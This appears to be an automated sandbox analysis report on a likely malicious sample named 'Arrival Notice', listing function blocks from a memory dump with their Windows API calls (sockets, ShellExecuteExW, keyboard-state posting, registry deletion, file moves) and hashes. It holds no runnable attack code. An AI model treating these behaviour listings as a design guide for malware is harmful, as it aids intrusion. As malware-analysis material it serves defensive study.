                                              • Opcode ID: a62c733a8c27c6dd6bd197057ebfbbc280bd2563853c3c337bf4095a41342b84
                                              • Instruction ID: c1a592af52ac8a3f0f6028f2c529d71b651ae88c71775d973c8c871f6fa8d8ac
                                              • Opcode Fuzzy Hash: a62c733a8c27c6dd6bd197057ebfbbc280bd2563853c3c337bf4095a41342b84
                                              • Instruction Fuzzy Hash: EDB1DA71602215EFDF24CF6AC9947BE7BB5FF08702F088069EC489B295D734A958CB90
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 008D2ACF
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000,000000FF), ref: 008D2B17
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 0090C46A
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 0090C4D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 11687efd34c8d2fe11a99ddd3946f3be9bc0ba028fa5f2a3c34f0a8468ae84f5
                                              • Instruction ID: 5d072d1df8b08348e5f202028a72d1a28636aa8208d90dd259fd1d6567c3d8b7
                                              • Opcode Fuzzy Hash: 11687efd34c8d2fe11a99ddd3946f3be9bc0ba028fa5f2a3c34f0a8468ae84f5
                                              • Instruction Fuzzy Hash: FE4105303187949EC7358B298C9CB7A7B96FBA5324F588A1BE047C67B0C675A881E710
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0093737F
                                                • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009373B6
                                              • EnterCriticalSection.KERNEL32(?), ref: 009373D2
                                              • _memmove.LIBCMT ref: 00937420
                                              • _memmove.LIBCMT ref: 0093743D
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0093744C
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00937461
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00937480
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: aa981fd92d692b7e85b86585c985ebd347fc6922c35d1904efa644a04871b220
                                              • Instruction ID: 93a9b1364d1332c2bc019e400f669f7800e52de5d6251c1b7be9e330de07167d
                                              • Opcode Fuzzy Hash: aa981fd92d692b7e85b86585c985ebd347fc6922c35d1904efa644a04871b220
                                              • Instruction Fuzzy Hash: CB317071904205EBCF10DFA9DC89AAFBBB8FF44711F1441A5FA04DB296DB309A10DBA1
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 0095645A
                                              • GetDC.USER32(00000000), ref: 00956462
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095646D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00956479
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009564B5
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009564C6
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00959299,?,?,000000FF,00000000,?,000000FF,?), ref: 00956500
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00956520
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: e0ea5ad6c3f838ccb522cf7a8383ad1e352f6648315e4ac1fab88d581ee20708
                                              • Instruction ID: e33fdd96c9e3faa88618f8e00d5f61bf769131c45fd0b87334e33d1ef35aadde
                                              • Opcode Fuzzy Hash: e0ea5ad6c3f838ccb522cf7a8383ad1e352f6648315e4ac1fab88d581ee20708
                                              • Instruction Fuzzy Hash: 97318D72215214BFEF108F11CC4AFEB3FADEF09766F040065FE089A191D6759842CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 9a74799085ca5bf9ef76cf30976ef769522fb32bdc085118cba7aae79fe62014
                                              • Instruction ID: 13fcdbe2bd46aad93df2a042b37884b2300dbec41a1d8da2b11f5a516cce8b35
                                              • Opcode Fuzzy Hash: 9a74799085ca5bf9ef76cf30976ef769522fb32bdc085118cba7aae79fe62014
                                              • Instruction Fuzzy Hash: 1D21C5E1684629B7DA14A735AC46FBF339CEF70799B040020FE05D62C7E759DD2181A6
                                              APIs
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                              • _wcstok.LIBCMT ref: 0093EEFF
                                              • _wcscpy.LIBCMT ref: 0093EF8E
                                              • _memset.LIBCMT ref: 0093EFC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: 3ca1320d650749d78950d51ea0ebb0ee4fda3bade7996511e2512954e6f36a34
                                              • Instruction ID: 9fca097b5fb82d4c02491ed4d8fc218d1172441cae4f1fde280209cd87557833
                                              • Opcode Fuzzy Hash: 3ca1320d650749d78950d51ea0ebb0ee4fda3bade7996511e2512954e6f36a34
                                              • Instruction Fuzzy Hash: F4C119715087419FC724EF28D895A6AB7E4FF85310F044A2EF899973A2DB70ED45CB82
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00946F14
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00946F35
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00946F48
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00946FFE
                                              • inet_ntoa.WSOCK32(?), ref: 00946FBB
                                                • Part of subcall function 0092AE14: _strlen.LIBCMT ref: 0092AE1E
                                                • Part of subcall function 0092AE14: _memmove.LIBCMT ref: 0092AE40
                                              • _strlen.LIBCMT ref: 00947058
                                              • _memmove.LIBCMT ref: 009470C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: 26fa6d50fc039c96d0fc0b54ecbad4be4f78e034359a9fea408fc13897156e88
                                              • Instruction ID: 10416b602624d8a5d5865876443649ea28808228e793232903e255fb01639db9
                                              • Opcode Fuzzy Hash: 26fa6d50fc039c96d0fc0b54ecbad4be4f78e034359a9fea408fc13897156e88
                                              • Instruction Fuzzy Hash: 7681EF71108300ABD710EF68CC86F6BB7E9EF84724F104A1EF5559B2A2DB70AD04CB92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4edece54643b447409d759252d084299f045aaf93a3d3871bc5f0ec5777784a2
                                              • Instruction ID: 7f65a58d7afb5a1199f4821ff10a9da9b5bf65a9bd9b1cb3f0b631541a94154e
                                              • Opcode Fuzzy Hash: 4edece54643b447409d759252d084299f045aaf93a3d3871bc5f0ec5777784a2
                                              • Instruction Fuzzy Hash: 8C714B30904109FFCF049F99C849AAEBB7AFF85324F14825AF915AB351C734AA51CBA5
                                              APIs
                                              • IsWindow.USER32(015676F8), ref: 0095B6A5
                                              • IsWindowEnabled.USER32(015676F8), ref: 0095B6B1
                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0095B795
                                              • SendMessageW.USER32(015676F8,000000B0,?,?), ref: 0095B7CC
                                              • IsDlgButtonChecked.USER32(?,?), ref: 0095B809
                                              • GetWindowLongW.USER32(015676F8,000000EC), ref: 0095B82B
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0095B843
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: 9eb5b22bf60adc1dde7e4cf520f5e624d579775c2a3b2b3ac42338cdef4d383b
                                              • Instruction ID: a895e0ecbd20efbff94687cbeadc8793a3cb76a97fc905b58d5939a80186fff2
                                              • Opcode Fuzzy Hash: 9eb5b22bf60adc1dde7e4cf520f5e624d579775c2a3b2b3ac42338cdef4d383b
                                              • Instruction Fuzzy Hash: 6371BB34605304AFDB20DF66C8A4FAABBF9FF89352F144469FD45972A1C731A848DB10
                                              APIs
                                              • _memset.LIBCMT ref: 0094F75C
                                              • _memset.LIBCMT ref: 0094F825
                                              • ShellExecuteExW.SHELL32(?), ref: 0094F86A
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                              • GetProcessId.KERNEL32(00000000), ref: 0094F8E1
                                              • CloseHandle.KERNEL32(00000000), ref: 0094F910
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: c82eee7e3fcde8c9ebc21b8d5c1579465238792d7b43fbb725d3756728c27005
                                              • Instruction ID: 6982b11894ba824591fb8afd2f7c124e0d3ae5bb7413b4152e691fbbfd620450
                                              • Opcode Fuzzy Hash: c82eee7e3fcde8c9ebc21b8d5c1579465238792d7b43fbb725d3756728c27005
                                              • Instruction Fuzzy Hash: A5619075A0061AEFCF14EF68C5909AEBBF5FF48310F14856AE846AB351CB30AD40CB91
                                              APIs
                                              • GetParent.USER32(?), ref: 0093149C
                                              • GetKeyboardState.USER32(?), ref: 009314B1
                                              • SetKeyboardState.USER32(?), ref: 00931512
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00931540
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0093155F
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 009315A5
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009315C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 23b48c09f54163f09856e001563f97d46c5c50db436fa55751cf87779215bc82
                                              • Instruction ID: 17903c1724b1cd883894ce21c6e6f4e39c7850791889ac3fd752bdf1f4cd52ad
                                              • Opcode Fuzzy Hash: 23b48c09f54163f09856e001563f97d46c5c50db436fa55751cf87779215bc82
                                              • Instruction Fuzzy Hash: F35103A0A087D53EFB3643748C09BBA7EAD5B46304F0C8489F1D6468E2C3D8EC94DB51
                                              APIs
                                              • GetParent.USER32(00000000), ref: 009312B5
                                              • GetKeyboardState.USER32(?), ref: 009312CA
                                              • SetKeyboardState.USER32(?), ref: 0093132B
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00931357
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00931374
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009313B8
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009313D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 8294b3b03e5f88d6d5bf0be25a61a9e2af2129ecd1b97cae8d4f1c2c95185048
                                              • Instruction ID: 97c37354f7b2fe3f0c6b5ca71ff02ca6b7a20d283c4a8544834e0b9f45d35e94
                                              • Opcode Fuzzy Hash: 8294b3b03e5f88d6d5bf0be25a61a9e2af2129ecd1b97cae8d4f1c2c95185048
                                              • Instruction Fuzzy Hash: 9D51F5A05087D53DFB3287248C55BBABFAD5F06300F0C8589F1D5468E2D795EC94EB61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: b190f9e7f9a7708977f82bb4b04916e78474c58573a86ed4733d36c0963ff015
                                              • Instruction ID: 8241e98bedef40682154c11ad196435e1623e8c407e4804011aaa20d1a3f171f
                                              • Opcode Fuzzy Hash: b190f9e7f9a7708977f82bb4b04916e78474c58573a86ed4733d36c0963ff015
                                              • Instruction Fuzzy Hash: 15418365C2161876CB10FBB888869DFB7A8EF04310F519566F618E3122E634E715CBA6
                                              APIs
                                                • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009338D3,?), ref: 009348C7
                                                • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009338D3,?), ref: 009348E0
                                              • lstrcmpiW.KERNEL32(?,?), ref: 009338F3
                                              • _wcscmp.LIBCMT ref: 0093390F
                                              • MoveFileW.KERNEL32(?,?), ref: 00933927
                                              • _wcscat.LIBCMT ref: 0093396F
                                              • SHFileOperationW.SHELL32(?), ref: 009339DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: 5fb10019f93aa9a50141444eca8613c03d1f4a9ec2d895e662a4c4d213a6737c
                                              • Instruction ID: 10a3f23d99c0559db7f9636ca66e57d8c52e8d406d54e04bab9bef19dee7f278
                                              • Opcode Fuzzy Hash: 5fb10019f93aa9a50141444eca8613c03d1f4a9ec2d895e662a4c4d213a6737c
                                              • Instruction Fuzzy Hash: BA416DB254C384DAC751EF64C881AEBB7ECEF89350F14592EB48AC3151EA74D688CB52
                                              APIs
                                              • _memset.LIBCMT ref: 00957519
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009575C0
                                              • IsMenu.USER32(?), ref: 009575D8
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00957620
                                              • DrawMenuBar.USER32 ref: 00957633
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: 5f322e1bfb6895010d2ec10f1a61a5f7ee4ae8a6f8391db3b511d457e35576c0
                                              • Instruction ID: bc1c881ff8fee560561bc115891e9b3b6fedb4c055212a8e623b9060725fed09
                                              • Opcode Fuzzy Hash: 5f322e1bfb6895010d2ec10f1a61a5f7ee4ae8a6f8391db3b511d457e35576c0
                                              • Instruction Fuzzy Hash: 4A416A74A05608EFDB10DF9AE884EAABBF8FB04361F048029FD1597250D730AE45DFA1
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0095125C
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00951286
                                              • FreeLibrary.KERNEL32(00000000), ref: 0095133D
                                                • Part of subcall function 0095122D: RegCloseKey.ADVAPI32(?), ref: 009512A3
                                                • Part of subcall function 0095122D: FreeLibrary.KERNEL32(?), ref: 009512F5
                                                • Part of subcall function 0095122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00951318
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 009512E0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: f3f3fb08c2ba271bacfd41f232113529392d98d83ff3f91436a1c0169e1598f6
                                              • Instruction ID: 04a00da72d790442b2590a581b2c22e2c59c3c05acb3b31fd4994a5f7f5c90f0
                                              • Opcode Fuzzy Hash: f3f3fb08c2ba271bacfd41f232113529392d98d83ff3f91436a1c0169e1598f6
                                              • Instruction Fuzzy Hash: BB315E71911209BFDB14DBA1DC99EFFB7BCEF08311F000169E911E2151DB749E499BA0
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0095655B
                                              • GetWindowLongW.USER32(015676F8,000000F0), ref: 0095658E
                                              • GetWindowLongW.USER32(015676F8,000000F0), ref: 009565C3
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009565F5
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0095661F
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00956630
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0095664A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
